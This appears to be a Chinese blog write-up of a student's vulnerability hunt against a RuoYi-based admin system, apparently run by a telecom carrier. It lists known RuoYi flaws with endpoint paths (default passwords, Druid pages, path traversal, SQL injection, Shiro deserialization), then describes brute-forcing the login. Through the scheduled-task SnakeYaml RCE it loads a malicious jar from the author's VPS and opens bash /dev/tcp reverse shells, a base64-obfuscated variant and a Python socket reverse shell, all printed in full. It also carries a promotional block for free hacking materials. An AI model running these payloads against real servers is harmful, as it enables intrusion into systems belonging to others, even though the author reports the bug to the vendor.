事件起因是因為要搞畢設了,在為這個苦惱,突然負責畢設的老師說得到cnvd下發的證書結合你的漏洞挖掘的過程是可以當成畢設的,當時又學習了一段時間的web滲透方面的知識,於是踏上了廢寢忘食的cnvd證書漏洞挖掘的日子。
前言:聽群友們說,一般可以獲得cnvd事件型的證書要三大運營商、鐵塔的漏洞,而且必須要高危的漏洞才可以獲得證書,低危和中危都沒有證書,交上去只能得到cnvd的漏洞編號,於是就朝著三大運營商、鐵塔的高危漏洞去挖掘。
一、資訊收集
資訊收集的目的是瞭解目標的基本情況,包括網路拓撲結構、系統架構、執行的服務和應用程式、已知漏洞、潛在安全風險等。透過資訊收集,滲透測試人員可以獲得對目標的深入瞭解,從而確定可能的攻擊向量和漏洞利用路徑,為後續的滲透測試工作做準備。
1、我一般先用奇安信的鷹圖平臺,使用裡面搜尋引擎的特定的語法搜尋我要找的單位名或者關鍵字,精準定位。
鷹圖平臺:https://hunter.qianxin.com/
經過一段時間的換各種關鍵字的搜尋,終於發現了一個看著系統介面比較眼熟的介面,原諒我的厚碼。。。
看著大機率是若依框架。
確定為vue前後端分離的若依管理系統。
二、歷史漏洞分析
確定了這個系統是基於SpringBoot,Spring Security,JWT,Vue & Element 的前後端分離許可權管理系統。
這是我第一次挖掘關於若依vue框架的系統,以前遇到的都是基於SpringBoot的許可權管理系統,核心技術採用Spring、MyBatis、Shiro。
讓我們先來看看若依的歷史漏洞和解析:若依框架是一個 Java EE 企業級快速開發平臺,基於經典技術組合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),內建模組如:部門管理、角色使用者、選單及按鈕授權、資料許可權、系統引數、日誌管理、通知公告等。線上定時任務配置;支援叢集,支援多資料來源,支援分散式事務。若依框架漏洞預設口令漏洞早期若依框架漏洞版本有反序列化漏洞 ,執行任意命令。
若依後臺管理系統是基於SpringBoot、Spring Security、JWT、Vue & Element 的前後端分離許可權管理系統,可用於包含網站管理後臺、網站會員中心、CMS、CRM、OA等、的Web應用程式。若依後臺管理系統存在未授權訪問和檔案上傳高危漏洞,攻擊者可利用該漏洞獲取伺服器控制權。
【----幫助網安學習,以下所有學習資料免費領!加vx:dctintin,備註 “部落格園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
比較常見的歷史漏洞:
1、前端儲存賬號密碼或預設弱口令admin/admin123
2、Druid頁面未授權訪問
http://xxx//prod-api/druid/index.html
http://xxx//dev-api/druid/index.html
http://xxx//api/druid/index.html
http://xxx//admin/druid/index.html
http://xxx//admin-api/druid/index.html
3、後臺任意檔案讀取http://xxx/common/download/resource?resource/profile/…/…/…/…/etc/passwd
4、後臺SQL隱碼攻擊漏洞位置在"系統管理"裡中的"角色管理中"http://xxxxxxx/system/role/listhttp://xxxxxxx/system/dept/edithttp://xxxxxxx/system/role/exporthttp://xxxxxxx/tool/gen/createTable
5、shiro反序列化
若依管理系統使用了Apache Shiro,Shiro 提供了記住我(RememberMe)的功能,下次訪問時無需再登入即可訪問。系統將金鑰硬編碼在程式碼裡,且在官方文件中並沒有強調修改該金鑰,導致框架使用者大多數都使用了預設金鑰。
攻擊者可以構造一個惡意的物件,並且對其序列化、AES加密、base64編碼後,作為cookie的rememberMe欄位傳送。Shiro將rememberMe進行解密並且反序列化,最終造成反序列化漏洞,進而在目標機器上執行任意命令。
眾所周知的,網上大把工具擼就完事了https://github.com/SummerSec/ShiroAttack2
6、SnakeYaml元件漏洞-定時任務-RCE
定時任務對於傳入的"呼叫目標字串"沒有任何校驗,導致攻擊者可以呼叫任意類、方法及引數觸發反射執行命令。
RuoYi 觸發 SnakeYaml 反序列化漏洞的漏洞點。漏洞點在後臺 系統監控 > 定時任務 處,可以呼叫類的方法
系統會呼叫 com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod
方法來處理系統任務
首先會獲取需要執行的目標,即我們的 payload,再獲取例項名和方法名以及方法引數
然後判斷例項名是否是 帶完全包名稱的類名,如果不是的話,則呼叫 SpringUtils.getBean(beanName)
獲得例項;如果是的話,則使用 Class.forName(beanName).newInstance()
獲得例項
最後呼叫 invokeMethod(SysJob sysJob)
方法實現方法的呼叫
public static void invokeMethod(SysJob sysJob) throws Exception
{
String invokeTarget \= sysJob.getInvokeTarget();
String beanName \= getBeanName(invokeTarget);
String methodName \= getMethodName(invokeTarget);
List<Object\[\]> methodParams \= getMethodParams(invokeTarget);
if (!isValidClassName(beanName))
{
Object bean \= SpringUtils.getBean(beanName);
invokeMethod(bean, methodName, methodParams);
}
else
{
Object bean \= Class.forName(beanName).newInstance();
invokeMethod(bean, methodName, methodParams);
}
}
跟進 com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod
可以看到這裡透過 getDeclaredMethod
獲得了類的方法,然後透過反射執行方法。
當我們傳入的類名為完全包名稱,需要滿足三個條件才能正常使用
-
具有無參構造方法
-
呼叫的方法需要是類自身宣告的方法,不能是他的父類方法
-
構造方法和呼叫的方法均為 public
而 org.yaml.snakeyaml.Yaml
是符合這些條件的,我們可以利用這個點去觸發 SnakeYaml 反序列化漏洞。
三、正戲開始
要獲得證書就得要挖掘到高危的漏洞,若依vue框架是沒有shiro反序列化的,所以得進入後臺去挖掘定時任務的RCE。
1、回到之前的找到若依的登入框,上來肯定是試一試預設的弱口令admin123。不出意外密碼錯誤了
2、測試了一下,沒有密碼輸入錯誤次數上限,就是輸入錯多少次都可以,也沒有驗證碼驗證登入,不用多說了,爆破啟動!!!
抱著試一試的態度,沒想到真滴爆出來了
畢竟是第一次打若依vue框架的,我就把上面提到的漏洞都測試了一遍,沒一個成功的(除了定時任務-RCE的漏洞沒測試)。。。。。
3、我先去網上瀏覽一陣子的若依後臺定時任務呼叫類的方法RCE的文章,開搞!!!
首先先去Github上面找到大佬寫好的專案生成惡意jar包:https://github.com/artsploit/yaml-payload先修改專案原始碼檔案 src/artsploit/AwesomeScriptEngineFactory.java 執行Linux反彈shell命令
修改AwesomeScriptEngineFactory.java格式:
Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/vpsIP/vps監聽埠 0>&1"});
在yaml-payload-master資料夾目錄下編譯AwesomeScriptEngineFactory.java檔案
javac .\src\artsploit\AwesomeScriptEngineFactory.java
得到編譯好的AwesomeScriptEngineFactory.class檔案
把src目錄打包成yaml-payload.jar檔案
jar -cvf yaml-payload.jar -C .\src\ .
把打包好的yaml-payload.jar上傳到vps上面,使用python命令開啟臨時的http網站:`python -m SimpleHTTPServer 8880
測試訪問vps開啟的網站
在vps上面使用nc監聽設定的埠,反彈shell
回到若依系統後臺,使用爆破出來的賬號密碼登入,進入系統監控-->定時任務-->新增,新增計劃任務。
呼叫方法也沒有什麼限制,可以直接使用http。任務名隨便寫,呼叫方法:org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager \[ !!java.net.URLClassLoader \[\[ !!java.net.URL \["http://httpIP/yaml-payload.jar"\] \]\] \]')
cron表示式:0/10 \* \* \* \* ?
點選確定
在多執行幾次剛剛設定好的定時任務
在我滿心歡喜的以為成功的時候,現實卻給我當頭一棒,nc監聽一直沒有動靜,啊啊啊啊啊啊啊啊啊。。。。。又去多執行了幾次也沒有反彈到shell
去看剛剛vps使用python開啟的http,沒有訪問響應gg。
想了想會不會是命令被系統攔截了或者是AwesomeScriptEngineFactory.java檔案裡面的命令錯誤執行不了。於是又去換了一種方式的反彈shell命令
重新修改AwesomeScriptEngineFactory.java格式:使用base64編碼這個命令:bash -i >& /dev/tcp/vpsIP/vps監聽埠 0>&1
base64編碼後的命令:YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNJUC92cHPnm5HlkKznq6/lj6MgMD4mMQ==
AwesomeScriptEngineFactory.java格式:Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNJUC92cHPnm5HlkKznq6/lj6MgMD4mMQ==}|{base64,-d}|{bash,-i}");
再按照上面的方法編譯一遍,然後再打包成jar檔案,再次上傳到vps裡面,把之前的刪掉。
返回到若依管理系統,再次執行幾次定時任務,不用更改。。。讓命令飄一會。
pleasantly surprised。。。。gg了。
四、柳暗花明
我以為要下播的時候,去上了個廁所。。。。回來突然有靈感想到可不可以使用python命令來執行反彈shell命令呢,現在的伺服器linux伺服器基本都是自帶python的,說幹就幹。
繼續修改AwesomeScriptEngineFactory.java檔案使用python的特性構造payload,修改的格式:Runtime.getRuntime().exec(new String\[\]{"python","-c","import os,socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(('vpsIP',vps監聽埠));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\['/bin/bash','-i'\]);"});
如下圖:
繼續執行之前的步驟,按照上面的方法編譯一遍,然後再打包成jar檔案,再次上傳到vps裡面,把之前的刪掉。
回到若依管理系統繼續執行我們寫入的定時任務。
結果蕪湖!!!成功成功。
咱也不知道為什麼。沒攔截python?
最後也是透過了cnvd的事件型高危
漏洞已上報廠家,廠家已修復。
修復建議:升級Ruoyi至最新版本。
更多網安技能的線上實操練習,請點選這裡>>